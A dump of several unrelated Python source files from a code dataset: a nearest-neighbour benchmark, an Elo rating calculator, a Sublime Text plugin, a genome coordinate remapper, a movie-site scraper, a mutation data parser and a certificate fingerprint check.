def get_dist(a, b):
"""Get the Euclidean distance of two points a and b."""
return np.linalg.norm(a - b)
def run_q_at_a_time(candidates, queries, k, n, algorithm):
"""
Run every single query in queries.
Parameters
----------
candidates : object
Datastructure which contains the nearest neighbor candidates.
queries : list
List of points
k : int
How many points should be found
n : int
Dimension of each point / query
"""
assert k >= 1
assert n >= 1
solution = np.zeros((len(queries), k, n))
for i, query in enumerate(queries):
solution[i] = algorithm(candidates, query, k, n)
return solution
def brute_force_search(candidates, query, k, n):
"""Find the k nearest neighbors by brute force search."""
solution = np.zeros((k, n))
knn = queue.PriorityQueue()
for candidate in candidates:
dist = get_dist(candidate, query)
# insert time to prevent errors as 'candidate' is not sortable.
knn.put((dist, time.time(), candidate))
for j in range(k):
dist, _, item = knn.get()
solution[j] = item
return solution
def build_datastructure(candidates):
"""Make something sophisticated to speed up k-nn queries."""
return candidates
# parameters
k = 5 # get k closest points
n = 128 # dimensionality of each point / query
m = 10**5 # candidates for closest points
T = 10**2 # number of queries
query_batch_size = 10**1 # should divide T
assert T % query_batch_size == 0
# paths
query_file = "queries.hdf5"
candidates_file = "candidates.hdf5"
###############################################################################
# Adjust this
# gets the candidates as argument and should return a datastructure D
create_datastructure_algorithm = build_datastructure
# Gets D, query, k, n as arguments
search_algorithm = brute_force_search
###############################################################################
# Create query and candidate files if not exist or load them otherwise
if not os.path.isfile(candidates_file):
logging.info("Start creating %i candidates." % m)
candidates = create_points(n, m)
with h5py.File(candidates_file, 'w') as f:
dset = f.create_dataset('candidates',
data=np.array(candidates),
# maxshape=(None, n),
dtype='float32')
else:
with h5py.File(candidates_file, 'r') as f:
candidates = np.array(f.get('candidates'))
if not os.path.isfile(query_file):
logging.info("Start creating %i queries." % T)
with h5py.File(query_file, 'w') as f:
dset = f.create_dataset('queries',
shape=(query_batch_size, n),
maxshape=(None, n),
dtype='float32',
chunks=(query_batch_size, n))
for i in range(T / query_batch_size):
logging.info("\tQuery batch%i of %i." %
(i + 1, T / query_batch_size))
queries = np.array(create_points(n, query_batch_size))
if i > 0:
dset.resize((dset.shape[0] + query_batch_size, n))
dset[-query_batch_size:dset.shape[0], :] = queries
# Evaluate
logging.info("Start evaluation.")
total_time = 0
D = create_datastructure_algorithm(candidates)
with h5py.File(query_file, 'r') as f:
queries = f.get('queries')
for i in range(T / query_batch_size):
logging.info("\tQuery batch %i of %i." % (i + 1, T / query_batch_size))
q = queries[i * query_batch_size:(i + 1) * query_batch_size]
t0 = time.time()
solution = run_q_at_a_time(D, q, k, n, search_algorithm) # TODO
# Store the solution and compare against brute force to check if
# it is correct
t1 = time.time()
total_time += t1 - t0
logging.info("Needed %i seconds in total." % (total_time))
logging.info("k={k}, n={n}, m={m}, T={T}: {time:.2f}s per query."
.format(k=k,
n=n,
m=m,
T=T,
time=float(total_time) / T))
| StarcoderdataPython |
3271270 | <filename>scripts/calculate_rating.py
'''
Implementation of following rating algorithm
https://codeforces.com/blog/entry/20762
'''
import itertools
import json
import pymysql
from pymysql.cursors import DictCursor
USER_QUERY = 'SELECT user_id, username from users'
# TODO technically if a user has the same start time, they'll show up twice, this could be an issue
RUNS_QUERY = ('''
SELECT r.run_id, r.prompt_id, r.user_id, u.username,
TIMESTAMPDIFF(MICROSECOND, r.start_time, r.end_time) AS run_time
FROM sprint_runs AS r
INNER JOIN sprint_prompts AS p ON p.prompt_id=r.prompt_id
RIGHT JOIN users AS u ON r.user_id=u.user_id
INNER JOIN (
SELECT user_id, MIN(run_id) as run_id
FROM sprint_runs AS runs
GROUP BY runs.prompt_id, runs.user_id
) t ON r.user_id = t.user_id AND r.run_id = t.run_id
WHERE p.rated = 1 AND r.end_time IS NOT NULL AND p.used AND p.active_end <= NOW()
ORDER BY p.active_start, run_time;
''')
STORE_RATINGS_QUERY = (
'''
REPLACE INTO ratings (user_id, rating, num_rounds) VALUES (%s, %s, %s);
'''
)
STORE_HISTORICAL_RATINGS_QUERY = (
'''
REPLACE INTO historical_ratings (user_id, prompt_id, prompt_date, `prompt_rank`, rating) VALUES
(
%(user_id)s,
%(prompt_id)s,
(SELECT active_start FROM sprint_prompts where prompt_id=%(prompt_id)s),
%(rank)s,
%(rating)s
);
'''
)
INITIAL_RATING = 1500
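# _elo_prob below is the standard Elo expected-score formula:
#     P(i beats j) = 1 / (1 + 10 ** ((rj - ri) / 400))
# e.g. ri = 1600 vs rj = 1500 gives roughly 0.64, so the higher-rated
# competitor is expected to finish ahead about 64% of the time.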
def _elo_prob(ri, rj):
return 1 / (1 + 10 ** ((rj - ri) / 400 ))
def _calculate_seed(users, round):
for u in round:
users[u]["seed"] = 1
for v in round:
if u == v: continue
users[u]["seed"] += _elo_prob(users[v]["rating"], users[u]["rating"])
def _calculate_place(users, round):
for place, u in enumerate(round):
users[u]["place"] = (place + 1)
def _calculate_desired_seed(users):
for u in users:
user = users[u]
if "seed" not in user or "place" not in user: continue
user["desired_seed"] = (user["seed"] * user["place"]) ** 0.5
def _rating_for_seed(users, round, u, desired_seed):
lo = 1
hi = 8000
while lo < hi:
mid = (lo + hi) // 2
mid_seed = 1
# TODO should we exclude ourselves?
for v in round:
if u == v: continue
mid_seed += _elo_prob(users[v]["rating"], mid)
if mid_seed > desired_seed:
lo = mid + 1
else:
hi = mid
return lo
def _calculate_new_ratings(users, round):
for u in round:
users[u]["target"] = _rating_for_seed(users, round, u, users[u]["desired_seed"])
# if we change it in the loop above, it will affect things
for u in round:
users[u]["rating"] = (users[u]["target"] + users[u]["rating"]) // 2
def _update(users, round):
if len(round) == 1: return
for u in round: users[u]["num_rounds"] += 1
_calculate_seed(users, round)
_calculate_place(users, round)
_calculate_desired_seed(users)
_calculate_new_ratings(users, round)
def calculate_ratings():
config = json.load(open("../config/default.json"))
try:
config.update(json.load(open("../config/prod.json")))
except FileNotFoundError:
pass
conn = pymysql.connect(
user=config["MYSQL_USER"],
host=config["MYSQL_HOST"],
password=config["<PASSWORD>"],
database=config['DATABASE']
)
with conn.cursor(cursor=DictCursor) as cursor:
cursor.execute(USER_QUERY)
users = {
u['user_id']: {
"rating": INITIAL_RATING,
"num_rounds": 0,
"username": u["username"]
} for u in cursor.fetchall()
}
cursor.execute(RUNS_QUERY)
runs = cursor.fetchall()
# Assert to catch case where RUNS_QUERY has duplicates
assert(len(runs) == len(set((r["prompt_id"], r["user_id"]) for r in runs)))
for prompt_id, round in itertools.groupby(runs, lambda r: r['prompt_id']):
print(f"Processing Prompt {prompt_id}")
# Since we order by run time in our query, this is in order of ranking
round = [run["user_id"] for run in round]
_update(users, round)
# Store historical data
with conn.cursor(cursor=DictCursor) as cursor:
cursor.executemany(STORE_HISTORICAL_RATINGS_QUERY,
[
{
"user_id": user_id,
"prompt_id": prompt_id,
"rank": i + 1,
"rating": users[user_id]["rating"],
}
for i, user_id in enumerate(round)
]
)
conn.commit()
# Store current ratings
with conn.cursor(cursor=DictCursor) as cursor:
cursor.executemany(STORE_RATINGS_QUERY,
[
(k, v["rating"], v["num_rounds"])
for k, v in users.items()
]
)
conn.commit()
ratings = sorted([(v["rating"], v["num_rounds"], v["username"]) for k, v in users.items()])
for (rating, num_rounds, username) in ratings:
print(f"{username}: {rating} ({num_rounds})")
if __name__ == "__main__":
calculate_ratings() | StarcoderdataPython |
1679543 | from credo.banks_and_currencies import BanksCurrencies
from . import PUBLIC_KEY, SECRET_KEY
class TestBankCurrencies:
instance = BanksCurrencies(public_key=PUBLIC_KEY, secret_key=SECRET_KEY)
# testing for the data types because these endpoints don't return a status in the json response on success
def test_currencies(self):
status, currencies = self.instance.get_currencies()
assert status == 200
def test_banks(self):
status, banks = self.instance.get_banks()
assert status == 200
| StarcoderdataPython |
141924 | import sublime
import sublime_plugin
import re
def panel_window(view):
for w in sublime.windows():
for panel in w.panels():
v = w.find_output_panel(panel.replace("output.", ""))
if v and v.id() == view.id():
return w
return None
def panel_is_visible(view):
window = panel_window(view)
if not window:
return False
active_panel = window.active_panel()
if not active_panel:
return False
active_view = window.find_output_panel(active_panel.replace("output.", ""))
return active_view == view
def view_is_visible(view):
window = view.window()
if not window:
return False
group, _ = window.get_view_index(view)
return window.active_view_in_group(group) == view
def view_size(view):
pixel_width, pixel_height = view.viewport_extent()
pixel_per_line = view.line_height()
pixel_per_char = view.em_width()
if pixel_per_line == 0 or pixel_per_char == 0:
return (0, 0)
settings = sublime.load_settings("Terminus.sublime-settings")
min_columns = settings.get("min_columns", 20)
max_columns = settings.get("max_columns", 500)
nb_columns = int(pixel_width / pixel_per_char) - 3
if nb_columns < min_columns:
nb_columns = min_columns
elif nb_columns > max_columns:
nb_columns = max_columns
nb_rows = int(pixel_height / pixel_per_line)
if nb_rows < 1:
nb_rows = 1
return (nb_rows, nb_columns)
class TerminusInsertCommand(sublime_plugin.TextCommand):
def run(self, edit, point, character):
self.view.insert(edit, point, character)
class TerminusTrimTrailingLinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
lastrow = view.rowcol(view.size())[0]
if not self.is_empty(lastrow):
view.insert(edit, view.size(), "\n")
lastrow = lastrow + 1
row = lastrow
while row >= 1:
if self.is_empty(row-1):
R = view.line(view.text_point(row, 0))
view.erase(edit, sublime.Region(R.a-1, R.b))
row = row-1
else:
if self.is_empty(row):
R = view.line(view.text_point(row, 0))
view.erase(edit, sublime.Region(R.a, R.b))
break
def is_empty(self, row):
view = self.view
return re.match(r"^\s*$", view.substr(view.line(view.text_point(row, 0))))
class TerminusNukeCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
view.replace(edit, sublime.Region(0, view.size()), "")
| StarcoderdataPython |
1793770 | # -*- coding: utf-8 -*-
import argparse
import ijson
import multiprocessing
import json
from os import linesep
from bisect import bisect_left
STOP_TOKEN = "<PASSWORD>!!!"
def file_writer(dest_filename, some_queue, some_stop_token):
"""Write JSON strings to a JSON list from a multiprocessing
queue to a file until the stop token is sent"""
is_start_of_json = True
with open(dest_filename, 'w') as dest_file:
dest_file.write("[")
while True:
line = some_queue.get()
if line == some_stop_token:
dest_file.write(linesep)
dest_file.write("]")
return
if is_start_of_json:
is_start_of_json = False
else:
dest_file.write(",")
dest_file.write(linesep)
dest_file.write(line)
def remap_genome_coordinate(coord, align_tuples, startpoints):
"""Given a tuple of chromosome alignment remappings,
remap a single coordinate"""
original_chromosome = coord["chromosome"]
# The bisect left function gives the nearest item in the array
# If the items are equal, in this case we want them to be part of
# The same mapping so we add 1
ind = bisect_left(startpoints, (coord["position"] + 1)) -1
if ind == -1:
#The coordinate is before the first chromosome
return None
chromosome_mapping = align_tuples[ind]
(source_start_point,
source_chromosome,
length,
new_start_point,
new_chromosome) = chromosome_mapping
if original_chromosome == source_chromosome:
bases_from_start = coord["position"] - source_start_point
# length of chromosome counts from 0 to (length -1)
within_range = bases_from_start < length
if bases_from_start >= 0 and within_range:
# The base from the coordinate is within range
coord["chromosome"] = new_chromosome
coord["position"] = new_start_point + bases_from_start
return coord
return None
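# Hedged worked example (illustration only): with a single alignment tuple
# align_tuples = [(0, "chr1", 100, 50, "chrA")] and startpoints = [0], the
# coordinate {"chromosome": "chr1", "position": 10} lies 10 bases into the
# mapped block, so it is remapped to {"chromosome": "chrA", "position": 60}.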
def remap_reference_genome(alignment_file_path,
coordinate_file_path,
writer_queue):
"""Given the file path to an alignment file and the
file path to a coordinate file
write an output file which maps
the source genome coordinates to a new reference genome"""
with open(alignment_file_path, 'r') as align:
alignments = ijson.items(align, 'item')
align_tuples = [(item["source"]["start"],
item["source"]["chromosome"],
item["length"],
item["target"]["start"],
item["target"]["chromosome"])
for item in alignments]
align_tuples.sort(key=lambda tup: tup[0])
startpoints = [tup[0] for tup in align_tuples]
with open(coordinate_file_path, 'r') as coordfile:
coords = ijson.items(coordfile, 'item')
for index, coord in enumerate(coords):
data_dict = remap_genome_coordinate(coord, align_tuples, startpoints)
if data_dict is not None:
writer_queue.put(json.dumps(data_dict))
def get_writer_process_and_queue(output):
"""Returns a multiprocessing process to write to a
file and a queue to do the writing"""
queue = multiprocessing.Queue()
return (
multiprocessing.Process(
target=file_writer,
args=(
output,
queue,
STOP_TOKEN)),
queue)
def handle_command(alignfile, coordsfile, output):
"""Given alignfile, coordsfile and output file paths, remap a genome"""
writer_process, writer_queue = get_writer_process_and_queue(output)
writer_process.start()
remap_reference_genome(alignfile, coordsfile, writer_queue)
writer_queue.put(STOP_TOKEN)
writer_process.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("alignfile", help="Path to the alignment JSON file")
parser.add_argument("coordsfile", help="Path to the coordinates JSON file")
parser.add_argument("output", help="Path to the desired output file")
args = parser.parse_args()
handle_command(args.alignfile, args.coordsfile, args.output)
| StarcoderdataPython |
3288563 | <gh_stars>0
import requests
from bs4 import BeautifulSoup
from pymongo import MongoClient
client = MongoClient('localhost', 27017)
db = client.team9TestOne
# Testing here
# TODO: write separate code that stores the release-date data in the database
movie_list = list(db.movies.find({}, {'_id': False}))
big_list = []
for movie in movie_list:
title = movie['title']
url = movie['url']
url = url.replace('basic', 'detail')
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get(url, headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
# Fetch the list via the detail url !! It does not strictly have to be the detail url; it is like this because the code was copied.
releases = soup.select('#content > div.article > div.wide_info_area > div.mv_info > p > span:nth-child(4) > a')
# content > div.article > div.wide_info_area > div.mv_info > p > span:nth-child(4) -- nth-child(4) is the release date
release_list = []
for release in releases:
release_list.append(release.text)
big_list.append(release_list)
# UPDATE rather than a plain insert into the database, because this code could not crawl and process everything in one pass, so an UPDATE is used
movies = list(db.movies.find({}, {'_id': False}))
for idx, movie in enumerate(movies):
title = movie['title']
# Before saving, process values like ['2021', '.05.26'] into a single string
dispose = big_list[idx]
year = dispose[0]
month_day = dispose[1]
year_month_day = year+month_day
big_list[idx] = year_month_day
db.movies.update_one({'title': title}, {'$set': {'release': big_list[idx]}})
| StarcoderdataPython |
1642454 | <reponame>bmorledge-hampton19/mutperiod
# This script takes data from the Kucab et al. mutation compendium paper and converts it to
# a trinucleotide context bed file.
import os, subprocess
from benbiohelpers.TkWrappers.TkinterDialog import TkinterDialog, Selections
from benbiohelpers.DNA_SequenceHandling import reverseCompliment, isPurine
from mutperiodpy.helper_scripts.UsefulFileSystemFunctions import (getIsolatedParentDir, generateFilePath, getDataDirectory,
DataTypeStr, generateMetadata, getAcceptableChromosomes)
def parseKucabCompendium(kucabSubstitutionsFilePaths, genomeFilePath, nucPosFilePath, includeAllPAHs):
for kucabSubstitutionsFilePath in kucabSubstitutionsFilePaths:
print("\nWorking in:",os.path.basename(kucabSubstitutionsFilePath))
if not kucabSubstitutionsFilePath.endswith("final.txt"):
raise ValueError("Error: Expected input file from Kucab data which should end in \"final.txt\".")
# Prepare the output file path.
localRootDirectory = os.path.dirname(kucabSubstitutionsFilePath)
dataGroupName = getIsolatedParentDir(kucabSubstitutionsFilePath)
if includeAllPAHs:
outputDirectory = os.path.join(localRootDirectory,"all_PAHs")
dataGroupName += "_all_PAHs"
else:
dataGroupName += "_smoker_lung"
outputDirectory = os.path.join(localRootDirectory,"smoker_lung")
# Make sure the data directory exists.
if not os.path.exists(outputDirectory): os.mkdir(outputDirectory)
# Generate the output file path and metadata
outputTrinucBedFilePath = generateFilePath(directory = outputDirectory, dataGroup = dataGroupName,
context = "trinuc", dataType = DataTypeStr.mutations, fileExtension = ".bed")
generateMetadata(dataGroupName, getIsolatedParentDir(genomeFilePath), getIsolatedParentDir(nucPosFilePath),
os.path.join("..",os.path.basename(kucabSubstitutionsFilePath)), outputDirectory)
# Get the list of acceptable chromosomes
acceptableChromosomes = getAcceptableChromosomes(genomeFilePath)
# These are the designations for PAH mutation signatures, the ones related to tobacco smoke that we want to study.
PAHDesignations = ("MSM0.54","MSM0.26","MSM0.92","MSM0.2","MSM0.42","MSM0.74","MSM0.103"
"MSM0.14","MSM0.82","MSM0.130","MSM0.12","MSM0.132","MSM0.13","MSM0.96")
# These designations specifically mimic the indel signature in smokers' lung cancer tumors.
LungCancerSpecificDesignations = ("MSM0.26","MSM0.92","MSM0.2","MSM0.103","MSM0.14")
# Set the designations that will be used to collect data based on the input to the function.
if includeAllPAHs:
relevantDesignations = PAHDesignations
else: relevantDesignations = LungCancerSpecificDesignations
print("Reading data and writing to trinuc bed file...")
with open(kucabSubstitutionsFilePath, 'r') as kucabSubstitutionsFile:
with open(outputTrinucBedFilePath, 'w') as outputTrinucBedFile:
firstLineFlag = True
for line in kucabSubstitutionsFile:
# Skip the first line with headers.
if firstLineFlag:
firstLineFlag = False
continue
# The lines are separated by tabs. The relevant data have the following indices in a tab-separated list:
# 15: mutagen designation
# 4: Chromosome
# 5: Start Pos (1 base)
# 6: Reference base
# 7: Mutated base
# 13: pre-base context
# 14: post-base context
choppedUpLine = line.strip().split('\t')
# Skip the mutation if it does not belong to the relevant group.
if not choppedUpLine[15] in relevantDesignations: continue
# Compile the necessary information for the bed file.
chromosome = "chr" + choppedUpLine[4]
# Handle the weird chromsome formatting and then check for invalid chromosomes.
if chromosome == "chr23": chromosome = "chrX"
if chromosome == "chr24": chromosome = "chrY"
if not chromosome in acceptableChromosomes: continue
startPos1Base = choppedUpLine[5]
startPos0Base = str(int(startPos1Base)-1)
mutatedFrom = choppedUpLine[6]
mutatedTo = choppedUpLine[7]
trinucContext = ''.join((choppedUpLine[13],mutatedFrom,choppedUpLine[14]))
# If the mutated base is listed as arising from a purine, flip the mutation and the strand.
if isPurine(mutatedFrom):
mutation = reverseCompliment(mutatedFrom) + '>' + reverseCompliment(mutatedTo)
strand = '-'
trinucContext = reverseCompliment(trinucContext)
else:
mutation = mutatedFrom + '>' + mutatedTo
strand = '+'
# Write the information to the trinuc bed file.
outputTrinucBedFile.write('\t'.join((chromosome, startPos0Base, startPos1Base,
trinucContext, mutation, strand)) + '\n')
# Sort the output file.
print("Sorting output file...")
subprocess.run(("sort","-k1,1","-k2,2n",outputTrinucBedFilePath,"-o",outputTrinucBedFilePath), check = True)
if __name__ == "__main__":
#Create the Tkinter UI
dialog = TkinterDialog(workingDirectory=getDataDirectory())
dialog.createMultipleFileSelector("Kucab Substitutions File Paths:",0,"final.txt",("text files",".txt")) #NOTE: Weird file ending?
dialog.createFileSelector("Genome Fasta File:",1,("Fasta Files",".fa"))
dialog.createFileSelector("Strongly Positioned Nucleosome File:",2,("Bed Files",".bed"))
dialog.createCheckbox("Include all PAH Designations",3,0)
# Run the UI
dialog.mainloop()
# If no input was received (i.e. the UI was terminated prematurely), then quit!
if dialog.selections is None: quit()
# Get the user's input from the dialog.
selections: Selections = dialog.selections
kucabSubstitutionsFilePaths = list(selections.getFilePathGroups())[0]
genomeFilePath = list(selections.getIndividualFilePaths())[0]
nucPosFilePath = list(selections.getIndividualFilePaths())[1]
includeAllPAHs = list(selections.getToggleStates())[0]
parseKucabCompendium(kucabSubstitutionsFilePaths, genomeFilePath, nucPosFilePath, includeAllPAHs) | StarcoderdataPython |
3373042 | <reponame>malithbc/Mole-AR-Stage1
# Generated by Django 3.2.5 on 2021-07-28 06:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('playground', '0012_image_user_id'),
]
operations = [
migrations.AddField(
model_name='image',
name='object_3D',
field=models.ImageField(default='Object3D/obj', upload_to='Object3D/'),
preserve_default=False,
),
]
| StarcoderdataPython |
1615294 | <gh_stars>0
import hashlib
from shippo.error import APIError
BLACKLISTED_DIGESTS = {
}
def verify(hostname, certificate):
"""Verifies a PEM encoded certficate against a blacklist of known revoked
fingerprints.
returns True on success, raises RuntimeError on failure.
"""
if hostname not in BLACKLISTED_DIGESTS:
return True
sha = hashlib.sha1()
sha.update(certificate)
fingerprint = sha.hexdigest()
if fingerprint in BLACKLISTED_DIGESTS[hostname]:
raise APIError("Invalid server certificate. You tried to "
"connect to a server that has a revoked "
"SSL certificate, which means we cannot "
"securely send data to that server. "
"Please email <EMAIL> if you "
"need help connecting to the correct API "
"server.")
return True
| StarcoderdataPython |